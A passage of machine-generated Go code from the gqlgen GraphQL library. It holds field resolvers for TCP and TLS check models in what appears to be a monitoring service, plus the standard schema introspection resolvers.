fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ErrorMsg, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_id(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_identifier(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Identifier, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_frecuency(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Frecuency, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_address(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Address, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_status(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Status, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_latestCheck(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.LatestCheck, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*time.Time)
fc.Result = res
return ec.marshalOTime2ᚖtimeᚐTime(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_message(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Message, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TlsCheck_errorMsg(ctx context.Context, field graphql.CollectedField, obj *models.TLSCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TlsCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ErrorMsg, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Directive_name(ctx context.Context, field graphql.CollectedField, obj *introspection.Directive) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Directive",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Name, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Directive_description(ctx context.Context, field graphql.CollectedField, obj *introspection.Directive) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Directive",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Description, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalOString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Directive_locations(ctx context.Context, field graphql.CollectedField, obj *introspection.Directive) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Directive",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Locations, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.([]string)
fc.Result = res
return ec.marshalN__DirectiveLocation2ᚕstringᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Directive_args(ctx context.Context, field graphql.CollectedField, obj *introspection.Directive) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Directive",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Args, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.([]introspection.InputValue)
fc.Result = res
return ec.marshalN__InputValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValueᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___EnumValue_name(ctx context.Context, field graphql.CollectedField, obj *introspection.EnumValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__EnumValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Name, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___EnumValue_description(ctx context.Context, field graphql.CollectedField, obj *introspection.EnumValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__EnumValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Description, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalOString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___EnumValue_isDeprecated(ctx context.Context, field graphql.CollectedField, obj *introspection.EnumValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__EnumValue",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.IsDeprecated(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(bool)
fc.Result = res
return ec.marshalNBoolean2bool(ctx, field.Selections, res)
}
func (ec *executionContext) ___EnumValue_deprecationReason(ctx context.Context, field graphql.CollectedField, obj *introspection.EnumValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__EnumValue",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.DeprecationReason(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*string)
fc.Result = res
return ec.marshalOString2ᚖstring(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_name(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Name, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_description(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Description, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalOString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_args(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Args, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.([]introspection.InputValue)
fc.Result = res
return ec.marshalN__InputValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValueᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_type(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Type, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalN__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_isDeprecated(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.IsDeprecated(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(bool)
fc.Result = res
return ec.marshalNBoolean2bool(ctx, field.Selections, res)
}
func (ec *executionContext) ___Field_deprecationReason(ctx context.Context, field graphql.CollectedField, obj *introspection.Field) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Field",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.DeprecationReason(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*string)
fc.Result = res
return ec.marshalOString2ᚖstring(ctx, field.Selections, res)
}
func (ec *executionContext) ___InputValue_name(ctx context.Context, field graphql.CollectedField, obj *introspection.InputValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__InputValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Name, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___InputValue_description(ctx context.Context, field graphql.CollectedField, obj *introspection.InputValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__InputValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Description, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalOString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___InputValue_type(ctx context.Context, field graphql.CollectedField, obj *introspection.InputValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__InputValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Type, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalN__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) ___InputValue_defaultValue(ctx context.Context, field graphql.CollectedField, obj *introspection.InputValue) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__InputValue",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.DefaultValue, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*string)
fc.Result = res
return ec.marshalOString2ᚖstring(ctx, field.Selections, res)
}
func (ec *executionContext) ___Schema_types(ctx context.Context, field graphql.CollectedField, obj *introspection.Schema) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Schema",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Types(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.([]introspection.Type)
fc.Result = res
return ec.marshalN__Type2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐTypeᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Schema_queryType(ctx context.Context, field graphql.CollectedField, obj *introspection.Schema) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Schema",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.QueryType(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalN__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) ___Schema_mutationType(ctx context.Context, field graphql.CollectedField, obj *introspection.Schema) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Schema",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.MutationType(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) ___Schema_subscriptionType(ctx context.Context, field graphql.CollectedField, obj *introspection.Schema) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Schema",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.SubscriptionType(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) ___Schema_directives(ctx context.Context, field graphql.CollectedField, obj *introspection.Schema) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Schema",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Directives(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.([]introspection.Directive)
fc.Result = res
return ec.marshalN__Directive2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐDirectiveᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_kind(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Kind(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalN__TypeKind2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_name(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Name(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*string)
fc.Result = res
return ec.marshalOString2ᚖstring(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_description(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Description(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalOString2string(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_fields(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field___Type_fields_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
